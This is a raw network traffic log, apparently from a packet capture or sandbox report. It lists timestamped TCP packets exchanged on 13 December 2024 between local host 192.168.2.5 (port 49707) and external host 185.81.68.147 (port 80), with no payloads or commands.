Dec 13, 2024 01:37:14.144774914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.144871950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.145591021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.145709038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.145767927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.146501064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.146608114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.147386074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.147440910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.147507906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.147573948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.148320913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.148495913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.148550034 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.149213076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.149415016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.149477959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.150125027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.150238991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.150294065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.151045084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.151148081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.151205063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.151945114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.152072906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.152185917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.152864933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.152956963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.153011084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.153795958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.153872967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.153925896 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.154685020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.154788017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.154849052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.155611038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.155709982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.155802011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.156486034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.156608105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.156656981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.157412052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.157519102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.157644033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.158315897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.158418894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.158519983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.159216881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.159306049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.159363985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.160142899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.160248995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.160305023 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.161042929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.161153078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.161287069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.161940098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.162111044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.162168980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.162873983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.162987947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.163129091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.163772106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.163886070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.163966894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.164664030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.164791107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.164843082 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.165589094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.165695906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.165745974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.166531086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.166623116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.166786909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.167402029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.167576075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.167627096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.168338060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.168442965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.168497086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.169220924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.169348001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.169409990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.170150042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.170260906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.170312881 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.171063900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.171161890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.171231985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.171952009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.172039986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.172557116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.172857046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.172913074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.172961950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.173768997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.173883915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.173944950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.174685955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.174799919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.174865007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.175596952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.175704956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.175753117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.176496983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.176619053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.176742077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.177417994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.177558899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.177624941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.178358078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.178450108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.179039001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.179229021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.179347992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.179398060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.180155993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.180262089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.180322886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.181066990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.181202888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.181252956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.181965113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.182084084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.182252884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.182861090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.182970047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.183026075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.183784008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.183897018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.183948040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.184680939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.184784889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.184849977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.185604095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.185705900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.185755014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.186517954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.186621904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.186806917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.187381983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.239042044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.331568003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.331722021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.332005978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.332072020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.332076073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.332201958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.332705975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.332809925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.332871914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.333611012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.333662987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.333853006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.334523916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.334609985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.334682941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.335582018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.335758924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.336222887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.336339951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.336461067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.336524010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.337269068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.337372065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.337424994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.338169098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.338280916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.338799000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.339068890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.339174986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.339231968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.339975119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.340044975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.340734959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.340897083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.341017008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.341069937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.341814995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.341945887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.342722893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.342777967 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.342830896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.342941999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.343605042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.343713999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.343910933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.344527006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.344640017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.344703913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.345441103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.345560074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.345612049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.346330881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.346446991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.346506119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.347269058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.347363949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.347420931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.348155975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.348270893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.348547935 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.349133968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.349298000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.349818945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.350019932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.350156069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.350207090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.350907087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.351032972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.351216078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.351814032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.351928949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.351988077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.352693081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.352822065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.352979898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.353626013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.353720903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.353780985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.354533911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.354639053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.354692936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.355437994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.355566025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.355634928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.356333017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.356513977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.356575012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.357287884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.357400894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.357453108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.358163118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.358225107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.358285904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.359078884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.359189987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.359252930 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.359977961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.360094070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.360158920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.360912085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.361041069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.361099958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.361809015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.361892939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.362338066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.362710953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.362840891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.362898111 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.363631010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.363746881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.363936901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.364531040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.364655018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.364723921 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.365473032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.365560055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.365659952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.366364002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.366445065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.366496086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.367276907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.367392063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.367444992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.368201017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.368326902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.368376017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.369082928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.369216919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.369302988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.370012045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.370132923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.370313883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.370908022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.371030092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.371088028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.371817112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.371944904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.371998072 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.372719049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.372859001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.372924089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.373631001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.373756886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.373821974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.374536037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.374618053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.374675035 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.375473976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.375562906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.375730038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.376372099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.376471043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.376621008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.377269983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.377387047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.377437115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.378190041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.378297091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.378357887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.379103899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.426578045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.523648977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.523724079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.523783922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.524075985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.524185896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.524239063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.524955034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.525065899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.525130033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.525897980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.526067019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.526842117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.526907921 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.526988029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.527065992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.527678967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.527787924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.527843952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.528609991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.528753042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.528808117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.529506922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.529622078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.529671907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.530425072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.530591965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.530733109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.531344891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.531445026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.531498909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.532218933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.532351971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.532402039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.533130884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.533282995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.533334970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.534065962 CET	80	49707	185.81.68.147	192.168.2.5
